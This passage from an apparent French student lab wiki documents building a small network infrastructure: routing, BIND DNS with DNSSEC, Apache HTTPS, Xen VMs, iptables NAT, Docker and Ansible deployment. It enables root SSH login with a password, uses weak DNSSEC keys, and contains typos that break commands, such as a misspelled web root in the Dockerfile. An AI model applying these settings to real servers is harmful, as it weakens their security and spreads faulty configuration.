        ia - IS-IS inter area, * - candidate default, U - per-user static route&lt;br /&gt;
        o - ODR, P - periodic downloaded static route, H - NHRP, l - LISP&lt;br /&gt;
        a - application route&lt;br /&gt;
        + - replicated route, % - next hop override, p - overrides from PfR&lt;br /&gt;
 &lt;br /&gt;
 Gateway of last resort is 192.168.222.14 to network 0.0.0.0&lt;br /&gt;
 &lt;br /&gt;
 O*E2  0.0.0.0/0 [110/1] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
       10.0.0.0/8 is variably subnetted, 85 subnets, 8 masks&lt;br /&gt;
 O E2     10.0.8.0/24 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.11.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.17.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.18.0.0/22 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.0.0/17 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.252.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.21.254.0/23 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.22.0.0/19 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
 O E2     10.24.0.0/16 [110/10] via 192.168.222.14, 1w1d, BDI131&lt;br /&gt;
  --More--&lt;br /&gt;
======Configuration du spanning tree======&lt;br /&gt;
Pour eviter que l'apparition de boucles dans notre infrastructure nous devons activer le protocole spanning-tree.&lt;br /&gt;
En effet, dans les réseaux commutés Ethernet la présence de boucle génère des tempêtes de diffusion qui paralysent le réseau : tous les liens sont saturés de trames de diffusion qui tournent en rond dans les boucles et les tables d'apprentissage des commutateurs (switch) deviennent instables. [https://fr.wikipedia.org/wiki/Spanning_Tree_Protocol plus] &lt;br /&gt;
&lt;br /&gt;
 spanning-tree mode pvst                # utilisation du protocole de planning tree en mode par Vlan (per vlan spanning tree)                                                                                                                         &lt;br /&gt;
 spanning-tree extend system-id         # utilisation du standard system-id pour l'assignation des identifiants uniques&lt;br /&gt;
&lt;br /&gt;
======unicast IPv6======&lt;br /&gt;
On active unicast IPv6 permettant de router les addresses IPv6 unicast Global (2001:...) que nous avons choisis.&lt;br /&gt;
 ipv6 unicast-routing&lt;br /&gt;
&lt;br /&gt;
==Services Internet == &lt;br /&gt;
&lt;br /&gt;
=== Serveur SSH ===&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la VM une première fois,  il faut utiliser la commande :&lt;br /&gt;
 xl console mycoplasma  --depuis cordouan.&lt;br /&gt;
&lt;br /&gt;
Pour sécuriser les services réseaux il faut être capable de se connecter à la VM en SSH, il faut faire quelques modifications dans le fichier etc/ssh/sshd_config de la VM. Voici la modification : &lt;br /&gt;
  #PermitRootLogin prohibit-password&lt;br /&gt;
par&lt;br /&gt;
  PermitRootLogin yes&lt;br /&gt;
&lt;br /&gt;
Par la suite, il sera possible d'accéder à la VM directement : &lt;br /&gt;
 ssh root@193.48.57.178&lt;br /&gt;
&lt;br /&gt;
===Serveur DNS ===&lt;br /&gt;
&lt;br /&gt;
Nous avons utiliser le registrar Gandi (http://www.gandi.net) pour réserver notre nom de domaine, nous avons choisi mycoplasma2.&lt;br /&gt;
&lt;br /&gt;
Dans un premier temps, faire apparaitre dans le fichier /etc/bind/named.conf.options la ligne suivante: &lt;br /&gt;
 dnssec-validation auto;&lt;br /&gt;
&lt;br /&gt;
====Configuration apache ====&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/apache2/sites-available/loadbalance.conf &lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:443&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site	&lt;br /&gt;
 	DocumentRoot /var/www/html/&lt;br /&gt;
 	ServerAdmin lina.mejbar@polytech-lille.net&lt;br /&gt;
 	SSLEngine on&lt;br /&gt;
 	SSLCertificateFile /etc/ssl/certs/mycoplasma2.site.crt&lt;br /&gt;
  	SSLCertificateKeyFile /etc/ssl/private/myserver.key &lt;br /&gt;
 	SSLCertificateChainFile /etc/ssl/certs/GandiStandardSSLCA2.pem&lt;br /&gt;
 	SSLVerifyClient None&lt;br /&gt;
 	ErrorLog ${APACHE_LOG_DIR}/lb-error.log&lt;br /&gt;
 	CustomLog ${APACHE_LOG_DIR}/lb-access.log combined&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;VirtualHost 193.48.57.178:80&amp;gt;&lt;br /&gt;
 	ServerName www.mycoplasma2.site&lt;br /&gt;
 	ServerAlias mycoplasma2.site&lt;br /&gt;
 	ProxyPass &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
  	ProxyPassReverse &amp;quot;/&amp;quot; &amp;quot;http://192.168.0.2:8002/&amp;quot;&lt;br /&gt;
 	Redirect &amp;quot;/&amp;quot; &amp;quot;https://www.mycoplasma2.site&amp;quot;&lt;br /&gt;
 &amp;lt;/VirtualHost&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin pour enregistrer nos modifications :&lt;br /&gt;
  a2enmod ssl&lt;br /&gt;
  a2ensite mycoplasma2.site.conf&lt;br /&gt;
  service apache2 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Comme on peut le voir sur la photo ci-dessous : nous avons accès à notre site de façon sécurisée.&lt;br /&gt;
[[Fichier:groupe2_https.png|center|500px|Nous avons accès au site sécurisé]]&lt;br /&gt;
&lt;br /&gt;
====Configuration bind9====&lt;br /&gt;
&lt;br /&gt;
BIND veut dire : Berkeley Internet Name Daemon&lt;br /&gt;
Nous avons déjà installer le package [http://www.example.com/ titre du lien ici].&lt;br /&gt;
&lt;br /&gt;
Ensuite il faut créer un fichier de configuration dans le dossier /etc/bind/ avec les informations de notre site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 ;&lt;br /&gt;
 ; BIND data file for local loopback interface&lt;br /&gt;
 ;&lt;br /&gt;
 $TTL	604800 &lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
  			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @       IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
Il faut modifier le fichier named.conf.local pour lui donner le nom de notre fichier configuration et de définir les paramètres généraux d'une zone.:&lt;br /&gt;
 root@mycoplasma:/etc/bind# cat named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
         type master;&lt;br /&gt;
         file &amp;quot;/etc/bind/mycoplasma2.site&amp;quot;; &lt;br /&gt;
         allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite relancer avec la commande suivante :&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
Il faut aussi ajouter dans l'onglet GlueRecords le nom de domaine de notre site, et celui de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de site web par certificat===&lt;br /&gt;
&lt;br /&gt;
On doit configurer apache2 en mode sécurisé à l’aide d’une clef asymétrique et d’un certificat signé par une autorité de certification. Le CA signe un CSR (Certificate Signing Request), pour ce faire il faut créer les clefs et le CSR en utilisant openssl. &lt;br /&gt;
Il faut ensuite le transformer en un certificat, on va donc configurer apache2 sur le port 443 afin qu'il puisse gérer du HTTPS. &lt;br /&gt;
&lt;br /&gt;
 openssl req -nodes -newkey rsa:2048 -sha256 -keyout myserver.key -out server.csr&lt;br /&gt;
&lt;br /&gt;
Il faut ensuite renseigner quelques informations : &lt;br /&gt;
&lt;br /&gt;
   Country Name (2 letter code) [AU]: '''France'''&lt;br /&gt;
   State or Province Name (full name) [Some-State]: '''Haut de France'''&lt;br /&gt;
   Locality Name (eg, city) []: '''Lille'''&lt;br /&gt;
   Organization Name (eg, company) [Internet Widgits Pty Ltd]: '''Polytech Lille'''&lt;br /&gt;
   Organizational Unit Name (eg, section) []: IMA5&lt;br /&gt;
   Common Name (e.g. server FQDN or YOUR name) []: '''mycoplasma2.site'''&lt;br /&gt;
   Email Address []:&lt;br /&gt;
   Please enter the following 'extra' attributes to be sent with your certificate request&lt;br /&gt;
   A challenge password []:&lt;br /&gt;
   An optional company name []:&lt;br /&gt;
&lt;br /&gt;
La seule vraie ligne où il ne faut pas se tromper, c'est celle où l'on indique le nom du site (Common Name), si la ligne est fausse Gandi n'acceptera pas votre clef.&lt;br /&gt;
Une fois ces informations renseignées, une clef est générée. &lt;br /&gt;
&lt;br /&gt;
/!\ Il faut la garder précieusement et ne pas la SUPPRIMER des fichiers de la machine virtuelle, dans ce cas il faudra tout recommencer avec un nouveau nom de domaine parce que la clef n'est générable qu'une seule fois.&lt;br /&gt;
Il faut maintenant copier le contenu de ce fichier avec le &amp;quot;BEGIN CERTIFICATE REQUEST-----&amp;quot; et le &amp;quot;END CERTIFICATE REQUEST-----&amp;quot; sur le site de gandi.&lt;br /&gt;
&lt;br /&gt;
===Sécurisation de serveur DNS par DNSSEC===&lt;br /&gt;
 root@mycoplasma:/etc/bind# vim named.conf&lt;br /&gt;
&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.options&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.local&amp;quot;;&lt;br /&gt;
 include &amp;quot;/etc/bind/named.conf.default-zones&amp;quot;&lt;br /&gt;
&lt;br /&gt;
Pour générer les clefs dans un même dossier, il faut le créer voici le chemin pour notre groupe :&lt;br /&gt;
 root@mycoplasma:/etc/bind/mycoplasma2.site.dnssec# &lt;br /&gt;
&lt;br /&gt;
Pour générer les clés KSK on lance la commande suivante :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 2048 -f KSK -n ZONE mycoplasma2.site&lt;br /&gt;
Pour ZSK :&lt;br /&gt;
 dnssec-keygen -a RSASHA1 -b 1048 -n ZONE mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
On peut maintenant rajouter nos clefs dans le fichier mycoplasma2.site: &lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/mycoplasma2.site&lt;br /&gt;
&lt;br /&gt;
 $TTL	604800&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-ksk.key'''&lt;br /&gt;
 '''$include /etc/bind/mycoplasma2.site.dnssec/mycoplasma2.site-zsk.key'''&lt;br /&gt;
 @	IN	SOA	ns.chlamydiae.site. root.mycoplasma2.site (&lt;br /&gt;
  			4	; Serial&lt;br /&gt;
 			604800	; Refresh&lt;br /&gt;
 			86400	; Retry&lt;br /&gt;
 			2419200	; Expire&lt;br /&gt;
 			604800 )	; Negative Cache TTL&lt;br /&gt;
 ;&lt;br /&gt;
 	IN	NS	ns.mycoplasma2.site.&lt;br /&gt;
 	IN	NS	ns6.gandi.net.&lt;br /&gt;
 @      IN      A       193.48.57.178&lt;br /&gt;
 ns	IN	A	193.48.57.178&lt;br /&gt;
 www	IN	A	193.48.57.178&lt;br /&gt;
&lt;br /&gt;
On signe les enregistrements de la zone en exécutant la commande suivante :&lt;br /&gt;
 dnssec-signzone -o mycoplasma2.site -k mycoplasma2.site-ksk ../mycoplasma2.site mycoplasma2.site-zsk&lt;br /&gt;
&lt;br /&gt;
Dernière étape, il fait ajouter le chemin du fichier pour utiliser le fichier de zone signé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~# cat /etc/bind/named.conf.local &lt;br /&gt;
&lt;br /&gt;
 zone &amp;quot;mycoplasma2.site&amp;quot; {&lt;br /&gt;
        type master;&lt;br /&gt;
        '''file &amp;quot;/etc/bind/mycoplasma2.site.signed&amp;quot;;''' &lt;br /&gt;
        allow-transfer {217.70.177.40;}; &lt;br /&gt;
 };&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 service bind9 restart&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Nous vérifions sous dnsviz.net le bon fonctionnement du DNSSEC :&lt;br /&gt;
[[Fichier:groupe2_dnsViz.png|center|500px]]&lt;br /&gt;
&lt;br /&gt;
===Serveur Freeradius===&lt;br /&gt;
&lt;br /&gt;
==Ferme de serveurs Web==&lt;br /&gt;
Il faut implanter une architecture d’équilibrage de charge pour un site Web.&lt;br /&gt;
&lt;br /&gt;
===Architecture générale de la ferme===&lt;br /&gt;
Pour ce faire, chaque binôme a créé une nouvelle machine virtuelle Xen qui hébergera un serveur Web. Ainsi chaque binôme pourra disposer de plusieurs serveurs Web proposant exactement le même site sur plusieurs machines différentes. Ces serveurs Web ne seront pas directement disponibles d’Internet mais au travers d’un équilibreur de charge tournant sur leur machine virtuelle principale.&lt;br /&gt;
&lt;br /&gt;
'''Nom de la Machine Virtuelle ''' : private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
'''Commandes''': &lt;br /&gt;
La MV doit être créée sur Cordouan.&lt;br /&gt;
 root@zabethX:~# ssh root@cordouan.insecserv.deule.net &lt;br /&gt;
&lt;br /&gt;
 root@cordouan:~# xen-create-image --hostname=private-mycoplasma --ip=ip 192.168.0.2 --dir=/usr/local/xen&lt;br /&gt;
 root@cordouan:~# xl create private-mlycoplasma.cfg&lt;br /&gt;
&lt;br /&gt;
Il faut suivre les logs de la création de la machine virtuelle avec le fichier suivant:&lt;br /&gt;
 root@cordouan:~# tail -f /var/log/xen-tools/private-mycoplasma.log&lt;br /&gt;
&lt;br /&gt;
Pour accèder une première fois à la machine virtuelle, il faut utiliser cette commande car SSH n'est pas encore autorisé.&lt;br /&gt;
 root@cordouan:~# xl console private-mycoplasma&lt;br /&gt;
&lt;br /&gt;
Pour l'activer voici les modifications, il faut remplacer la ligne suivante de ce fichier /etc/ssh/sshd_config :&lt;br /&gt;
 &amp;quot; #PermitRootLogin prohibit-password&amp;quot;  '''par'''  &amp;quot; PermitRootLogin yes&amp;quot; &lt;br /&gt;
&lt;br /&gt;
Il est possible de se connecter en SSH  et de paramétrer le proxy : &lt;br /&gt;
 root@cordouan:~# ssh root@192.168.0.2&lt;br /&gt;
 root@private-mycoplasma:~# export http_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# export https_proxy=http://proxy.plil.fr:3128&lt;br /&gt;
 root@private-mycoplasma:~# xen-create-image --hostname=herpesgenital --dhcp --dir=/usr/local/xen --force&lt;br /&gt;
&lt;br /&gt;
Il faut modifier l'adresse mac, pour avoir une adresse mac unique pour chaque binôme, et il faut configurer le bridge.&lt;br /&gt;
 vif = [ 'mac=00:16:3E:2B:FF:6A,bridge=IMA5sc-priv' ]&lt;br /&gt;
&lt;br /&gt;
Voici notre nouvelle structure :&lt;br /&gt;
[[Fichier:G2_Structure.png|center|800px]]&lt;br /&gt;
&lt;br /&gt;
Pour y arriver, il faut modifier les fichiers /etc/network/interfaces des deux machines virtuelles avec les adresses, Gateway, et netmask marque sur la photo ci-dessus. Et valider les modifications avec les commandes habituelles : ifdown eth'''i''' et ifup eth'''i'''&lt;br /&gt;
&lt;br /&gt;
=== Mascarade ===&lt;br /&gt;
&lt;br /&gt;
 iptables -P FORWARD DROP&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -s 192.168.0.0/24&lt;br /&gt;
 iptables -A FORWARD -j ACCEPT -d 192.168.0.0/24&lt;br /&gt;
 iptables -t nat -A POSTROUTING -j MASQUERADE -s 192.168.0.0/24&lt;br /&gt;
 echo 1 &amp;gt; /proc/sys/net/ipv4/ip_forward&lt;br /&gt;
 apt install iptables-persistent&lt;br /&gt;
 &lt;br /&gt;
Il faut ensuite décommenter &lt;br /&gt;
 net.ipv4.ipforward=1&lt;br /&gt;
&lt;br /&gt;
=== Création du conteneur ===&lt;br /&gt;
&lt;br /&gt;
Il est important dans cette partie que tous les binômes se mettent d'accord pour installer le même package de docker &lt;br /&gt;
 root@mycoplasma:~/#  ansible-galaxy install geerlingguy.docker&lt;br /&gt;
&lt;br /&gt;
Voici le fichier DockerFile que l'on a codé :&lt;br /&gt;
&lt;br /&gt;
 root@mycoplasma:~/test# cat docker/Dockerfile &lt;br /&gt;
&lt;br /&gt;
 FROM centos:latest&lt;br /&gt;
 MAINTAINER NewstarCorporation&lt;br /&gt;
 RUN yum -y install httpd&lt;br /&gt;
 COPY mycoplasma/index.html /var/wwww/html/index.html&lt;br /&gt;
 CMD [&amp;quot;/usr/sbin/httpd&amp;quot;, &amp;quot;-D&amp;quot;, &amp;quot;FOREGROUND&amp;quot;]&lt;br /&gt;
 EXPOSE 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On a eu le problème suivant lorsqu'on souhaite visiter notre site : &lt;br /&gt;
&lt;br /&gt;
[[Fichier:G2_mycoplasmaSite.png|center|900px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker ps =&amp;gt; Notre docker &amp;quot;mycoplasma&amp;quot;  tourne donc  ce n'est pas le problème.&lt;br /&gt;
&lt;br /&gt;
 root@corduan:~/# docker exec -it &amp;lt;CONTAINER ID&amp;gt; /bash/bin &lt;br /&gt;
 root@&amp;lt;CONTAINER ID&amp;gt;:~/# ls /var/www/html &lt;br /&gt;
&lt;br /&gt;
Avec cette dernière commande, on peut voir que le fichier index.html ne s'est pas copié malgré les commandes du Dockerfile. Pourtant le Docker build s'est exécuté sans afficher d'erreurs. On peut voir les logs pour avoir une idée : &lt;br /&gt;
  root@corduan:~/# docker logs &amp;lt;CONTAINER ID&amp;gt;&lt;br /&gt;
Voici le résultat : &lt;br /&gt;
 AH00558: httpd: Could not reliably determine the server's fully qualified domain name, using 172.17.0.5. Set the 'ServerName' directive globally to suppress this message&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=== Ansible ===&lt;br /&gt;
Ansible est un logiciel Open Source qui permet de gérer finement une infrastructure informatique, les déploiements automatisés multi-environnements, les ordinateurs et les configurations systèmes[https://www.syloe.com/glossaire/ansible plus]. Nous allons nous servir de cet outil afin d'automatiser le déploiement de notre site web sur la ferme de serveurs.&lt;br /&gt;
&lt;br /&gt;
====Diffusion de la clé SSH====&lt;br /&gt;
Pour travailler le plus efficacement avec ansible il faut que l'on puissent se connecter en SSH aux machines cibles sans avoir à taper le mot de passe à chaque fois. Pour ce faire, nous devons  ajouter manuellement notre clé publique à la liste des hôtes autorisés sur chaque machine.&lt;br /&gt;
 &lt;br /&gt;
Etape à suivre sur notre machine virtuelle publique:&lt;br /&gt;
* On installe ansible avec un apt-get.&lt;br /&gt;
* On génère une clef asymétrique:&lt;br /&gt;
 ssh-keygen -t rsa&lt;br /&gt;
* On diffuse la clef publique sur les machines virtuelles privées 192.168.0.1 à 192.168.0.6  :&lt;br /&gt;
 cat .ssh/id_rsa.pub | ssh 192.168.0.1 &amp;quot;cat &amp;gt;&amp;gt; /root/.ssh/authorized_keys2&amp;quot;&lt;br /&gt;
&lt;br /&gt;
====Hosts====&lt;br /&gt;
Sur la VM publique et afin de rendre notre inventaire plus explicite, nous ajoutons la configuration des noms d'hôtes à notre /etc/network/hosts:&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/hosts'''&lt;br /&gt;
 127.0.0.1    localhost&lt;br /&gt;
 127.0.1.1    mycoplasma mycoplasma&lt;br /&gt;
 192.168.0.1	private-6phil&lt;br /&gt;
 192.168.0.2	private-mycoplasma	&lt;br /&gt;
 192.168.0.3	private-herpesgenital&lt;br /&gt;
 192.168.0.4	private-chlamydiae &lt;br /&gt;
 192.168.0.5	private-chaudepisse&lt;br /&gt;
 192.168.0.6	private-blennoragie&lt;br /&gt;
 ...&lt;br /&gt;
&lt;br /&gt;
Toujours sur la VM publique on rédige l'inventaire de notre parc en modifiant ( /etc/ansible/hosts ) c'est un fichier à remplir en utilisant la syntaxe YAML:&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:~# cat /etc/ansible/hosts'''       &lt;br /&gt;
 all:&lt;br /&gt;
  hosts:&lt;br /&gt;
   mycoplasma:&lt;br /&gt;
  children:&lt;br /&gt;
   webservers:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-6phil:&lt;br /&gt;
     private-mycoplasma:&lt;br /&gt;
     private-herpesgenital:&lt;br /&gt;
     private-chlamydiae:&lt;br /&gt;
     private-chaudepisse:&lt;br /&gt;
     private-blennoragie:&lt;br /&gt;
   ntp-client:&lt;br /&gt;
    hosts:&lt;br /&gt;
     private-mycoplasma&lt;br /&gt;
   ntp-server:&lt;br /&gt;
    hosts:&lt;br /&gt;
     mycoplasma&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
On peut tester notre parc:&lt;br /&gt;
 '''root@mycoplasma:~# ansible all -m ping -o'''&lt;br /&gt;
 private-6phil         | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-mycoplasma    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-herpesgenital | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chlamydiae    | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 mycoplasma            | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-chaudepisse   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
 private-blennoragie   | SUCCESS =&amp;gt; {&amp;quot;changed&amp;quot;: false,&amp;quot;ping&amp;quot;: &amp;quot;pong&amp;quot;}&lt;br /&gt;
&lt;br /&gt;
====Playbooks====&lt;br /&gt;
&lt;br /&gt;
Maintenant qu'on a défini toutes les machines dans notre parc et qu'on peut se connecter sans mot de passe, on peut exécuter une commande à distance sur tout le parc.&lt;br /&gt;
Un &amp;quot;playbook&amp;quot; c'est un moyen d’exécuter une liste des tâches sur des machines à l'aide d'ansible. Nous avons préparé le palybook suivant pour le déploiement de notre ferme de serveurs.&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# cat deploy-site.yaml''' &lt;br /&gt;
 ---&lt;br /&gt;
 - hosts: webservers&lt;br /&gt;
   tasks: &lt;br /&gt;
    - name: 1. Copying Website files&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/index.html&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/index.html&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 2. Copying Dockerfile&lt;br /&gt;
      copy:&lt;br /&gt;
        src: &amp;quot;deployment-files/Dockerfile&amp;quot;&lt;br /&gt;
        dest: &amp;quot;/tmp/docker/mycoplasma/Dockerfile&amp;quot;&lt;br /&gt;
        owner: root&lt;br /&gt;
        group: root&lt;br /&gt;
        mode: '0666'&lt;br /&gt;
    - name: 3. Install pip&lt;br /&gt;
      apt: name=python-pip state=present&lt;br /&gt;
    - name: 4. install docker package&lt;br /&gt;
      pip: name=docker&lt;br /&gt;
    - name: 5. Stop container if running&lt;br /&gt;
      docker_container:&lt;br /&gt;
       name: mycoplasmacontainer&lt;br /&gt;
       state: stopped&lt;br /&gt;
    - name: 6. delete image&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        force: yes&lt;br /&gt;
        state: absent&lt;br /&gt;
    - name: 7. Build Docker image from Dockerfile&lt;br /&gt;
      docker_image:&lt;br /&gt;
        name: mycoplasma&lt;br /&gt;
        path: &amp;quot;/tmp/docker/mycoplasma/&amp;quot;&lt;br /&gt;
        state: build&lt;br /&gt;
    - name: 8. Running the container&lt;br /&gt;
      docker_container:&lt;br /&gt;
        image: mycoplasma:latest&lt;br /&gt;
        state: started&lt;br /&gt;
        recreate: yes&lt;br /&gt;
        name: mycoplasmacontainer&lt;br /&gt;
        ports: &amp;quot;8002:80&amp;quot;&lt;br /&gt;
    - name: 9. Check if container is running&lt;br /&gt;
      shell: docker ps&lt;br /&gt;
&lt;br /&gt;
 '''root@mycoplasma:/etc/ansible/PLAYBOOKS# ansible-playbook deploy-site.yaml'''&lt;br /&gt;
&lt;br /&gt;
 PLAY [webservers]     *********************************************************************************************************************************************** *******&lt;br /&gt;
&lt;br /&gt;
 TASK [Gathering Facts]  *************************************************************************************************************************************************&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie]&lt;br /&gt;
&lt;br /&gt;
 TASK [1. Copying Website files] ****************************************************************************************************************************************&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [2. Copying Dockerfile] *******************************************************************************************************************************************&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [3. Install pip] **************************************************************************************************************************************************&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [4. install docker package] ***************************************************************************************************************************************&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [5. Stop container if running] ************************************************************************************************************************************&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie]&lt;br /&gt;
&lt;br /&gt;
 TASK [6. delete image] ****************************************************************************************************************************************************&lt;br /&gt;
 ok: [private-herpesgenital]&lt;br /&gt;
 ok: [private-mycoplasma]&lt;br /&gt;
 ok: [private-chaudepisse]&lt;br /&gt;
 ok: [private-chlamydiae]&lt;br /&gt;
 ok: [private-6phil]&lt;br /&gt;
 ok: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [7. Build Docker image from Dockerfile] ***************************************************************************************************************************&lt;br /&gt;
 changed: [private-6phil]&lt;br /&gt;
 changed: [private-mycoplasma]&lt;br /&gt;
 changed: [private-herpesgenital]&lt;br /&gt;
 changed: [private-chaudepisse]&lt;br /&gt;
 changed: [private-chlamydiae]&lt;br /&gt;
 changed: [private-blennoragie] &lt;br /&gt;
&lt;br /&gt;
 TASK [8. Running the container]  ****************************************************************************************************************************************&lt;br /&gt;
 changed: [private-6phil]&lt;br /&gt;
 changed: [private-mycoplasma]&lt;br /&gt;
 changed: [private-blennoragie]&lt;br /&gt;
 changed: [private-herpesgenital]&lt;br /&gt;
 changed: [private-chaudepisse]&lt;br /&gt;
 changed: [private-chlamydiae]&lt;br /&gt;
&lt;br /&gt;
 TASK [9. Check if container is running] ********************************************************************************************************************************&lt;br /&gt;
 changed: [private-6phil]&lt;br /&gt;
 changed: [private-mycoplasma]&lt;br /&gt;
 changed: [private-chlamydiae]&lt;br /&gt;
 changed: [private-blennoragie]&lt;br /&gt;
 changed: [private-herpesgenital]&lt;br /&gt;
 changed: [private-chaudepiss]&lt;br /&gt;
&lt;br /&gt;
 PLAY RECAP *************************************************************************************************************************************************************&lt;br /&gt;
 private-6phil              : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-blennoragie        : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
 private-chaudepisse        : ok=10   changed=3    unreachable=0    failed=0   &lt;br /&gt;
